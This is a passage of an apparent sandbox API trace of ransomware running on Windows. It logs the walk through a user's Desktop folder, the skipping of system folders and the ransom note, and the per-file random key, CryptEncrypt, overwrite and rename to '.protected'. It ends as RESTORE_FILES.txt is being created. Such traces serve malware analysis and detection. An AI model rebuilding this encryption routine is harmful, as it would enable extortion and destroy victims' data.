(in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\tecr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.207] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a") returned 93 [0091.207] StrStrW (lpFirst="tECR.m4a", lpSrch=".txt") returned 0x0 [0091.207] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a") returned 93 [0091.207] StrStrW (lpFirst="tECR.m4a", lpSrch=".rar") returned 0x0 [0091.207] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a") returned 93 [0091.207] StrStrW (lpFirst="tECR.m4a", lpSrch=".zip") returned 0x0 [0091.207] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.208] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.208] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.208] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0091.208] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.208] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.208] CloseHandle (hObject=0x14c) returned 1 [0091.209] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a.protected") returned 103 [0091.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\tecr.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\tecr.m4a.protected")) returned 1 [0091.209] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.209] lstrcmpiW (lpString1="uGs-KX.png", lpString2="Windows") returned -1 [0091.209] lstrcmpiW (lpString1="uGs-KX.png", lpString2="Program Files") returned 1 [0091.209] lstrcmpiW (lpString1="uGs-KX.png", lpString2="Program Files (x86)") returned 1 [0091.209] lstrcmpiW (lpString1="uGs-KX.png", lpString2="$Recycle.bin") returned 1 [0091.209] lstrcmpiW (lpString1="uGs-KX.png", lpString2="System Volume Information") returned 1 [0091.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png") returned 95 [0091.209] StrStrIW (lpFirst="uGs-KX.png", lpSrch=".protected") returned 0x0 [0091.209] lstrcmpW (lpString1="uGs-KX.png", lpString2="RESTORE_FILES.txt") returned 1 [0091.209] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.210] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\ugs-kx.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png") returned 95 [0091.210] StrStrW (lpFirst="uGs-KX.png", lpSrch=".txt") returned 0x0 [0091.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png") returned 95 [0091.210] StrStrW (lpFirst="uGs-KX.png", lpSrch=".rar") returned 0x0 [0091.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png") returned 95 [0091.210] StrStrW (lpFirst="uGs-KX.png", lpSrch=".zip") returned 0x0 [0091.210] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.211] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.211] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.211] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.211] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.211] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.211] CloseHandle (hObject=0x14c) returned 1 [0091.211] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png.protected") returned 105 [0091.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\ugs-kx.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\ugs-kx.png.protected")) returned 1 [0091.212] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.212] lstrcmpiW (lpString1="vfsNT.jpg", lpString2="Windows") returned -1 [0091.212] lstrcmpiW (lpString1="vfsNT.jpg", lpString2="Program Files") returned 
1 [0091.212] lstrcmpiW (lpString1="vfsNT.jpg", lpString2="Program Files (x86)") returned 1 [0091.212] lstrcmpiW (lpString1="vfsNT.jpg", lpString2="$Recycle.bin") returned 1 [0091.212] lstrcmpiW (lpString1="vfsNT.jpg", lpString2="System Volume Information") returned 1 [0091.212] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg") returned 94 [0091.212] StrStrIW (lpFirst="vfsNT.jpg", lpSrch=".protected") returned 0x0 [0091.212] lstrcmpW (lpString1="vfsNT.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0091.212] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.212] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\vfsnt.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg") returned 94 [0091.212] StrStrW (lpFirst="vfsNT.jpg", lpSrch=".txt") returned 0x0 [0091.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg") returned 94 [0091.212] StrStrW (lpFirst="vfsNT.jpg", lpSrch=".rar") returned 0x0 [0091.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg") returned 94 [0091.212] StrStrW 
(lpFirst="vfsNT.jpg", lpSrch=".zip") returned 0x0 [0091.212] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.213] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.213] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.213] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.213] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.213] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.213] CloseHandle (hObject=0x14c) returned 1 [0091.213] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg.protected") returned 104 [0091.213] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\vfsnt.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vfsNT.jpg.protected" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\vfsnt.jpg.protected")) returned 1 [0091.214] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.214] lstrcmpiW (lpString1="vwoPh3j6Ubn-TQn.mp3", lpString2="Windows") returned -1 [0091.214] lstrcmpiW (lpString1="vwoPh3j6Ubn-TQn.mp3", lpString2="Program Files") returned 1 [0091.214] lstrcmpiW (lpString1="vwoPh3j6Ubn-TQn.mp3", lpString2="Program Files (x86)") returned 1 [0091.214] lstrcmpiW (lpString1="vwoPh3j6Ubn-TQn.mp3", lpString2="$Recycle.bin") returned 1 [0091.214] lstrcmpiW (lpString1="vwoPh3j6Ubn-TQn.mp3", lpString2="System Volume Information") returned 1 [0091.214] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3") returned 104 [0091.214] StrStrIW (lpFirst="vwoPh3j6Ubn-TQn.mp3", lpSrch=".protected") returned 0x0 [0091.214] lstrcmpW (lpString1="vwoPh3j6Ubn-TQn.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0091.214] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.214] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\vwoph3j6ubn-tqn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3") returned 104 [0091.215] StrStrW (lpFirst="vwoPh3j6Ubn-TQn.mp3", lpSrch=".txt") returned 0x0 [0091.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3") returned 104 [0091.215] StrStrW (lpFirst="vwoPh3j6Ubn-TQn.mp3", lpSrch=".rar") returned 0x0 [0091.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3") returned 104 [0091.215] StrStrW (lpFirst="vwoPh3j6Ubn-TQn.mp3", lpSrch=".zip") returned 0x0 [0091.215] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.215] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.215] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.216] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.216] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.216] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.216] CloseHandle (hObject=0x14c) returned 1 [0091.216] wnsprintfW (in: 
pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3.protected") returned 114 [0091.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\vwoph3j6ubn-tqn.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\vwoPh3j6Ubn-TQn.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\vwoph3j6ubn-tqn.mp3.protected")) returned 1 [0091.216] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.216] lstrcmpiW (lpString1="zgN7cDaCvnfUZOY8z-R_.m4a", lpString2="Windows") returned 1 [0091.216] lstrcmpiW (lpString1="zgN7cDaCvnfUZOY8z-R_.m4a", lpString2="Program Files") returned 1 [0091.217] lstrcmpiW (lpString1="zgN7cDaCvnfUZOY8z-R_.m4a", lpString2="Program Files (x86)") returned 1 [0091.217] lstrcmpiW (lpString1="zgN7cDaCvnfUZOY8z-R_.m4a", lpString2="$Recycle.bin") returned 1 [0091.217] lstrcmpiW (lpString1="zgN7cDaCvnfUZOY8z-R_.m4a", lpString2="System Volume Information") returned 1 [0091.217] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a") returned 109 [0091.217] StrStrIW (lpFirst="zgN7cDaCvnfUZOY8z-R_.m4a", lpSrch=".protected") returned 0x0 [0091.217] lstrcmpW (lpString1="zgN7cDaCvnfUZOY8z-R_.m4a", lpString2="RESTORE_FILES.txt") returned 1 [0091.217] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.217] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\zgn7cdacvnfuzoy8z-r_.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.217] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a") returned 109 [0091.217] StrStrW (lpFirst="zgN7cDaCvnfUZOY8z-R_.m4a", lpSrch=".txt") returned 0x0 [0091.217] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a") returned 109 [0091.217] StrStrW (lpFirst="zgN7cDaCvnfUZOY8z-R_.m4a", lpSrch=".rar") returned 0x0 [0091.217] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a") returned 109 [0091.217] StrStrW (lpFirst="zgN7cDaCvnfUZOY8z-R_.m4a", lpSrch=".zip") returned 0x0 [0091.217] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.218] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.218] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.218] SetFilePointerEx 
(in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.218] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.218] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.218] CloseHandle (hObject=0x14c) returned 1 [0091.218] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a.protected") returned 119 [0091.218] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\zgn7cdacvnfuzoy8z-r_.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\zgN7cDaCvnfUZOY8z-R_.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\zgn7cdacvnfuzoy8z-r_.m4a.protected")) returned 1 [0091.219] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0091.219] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0091.219] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\RESTORE_FILES.txt") returned 102 [0091.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
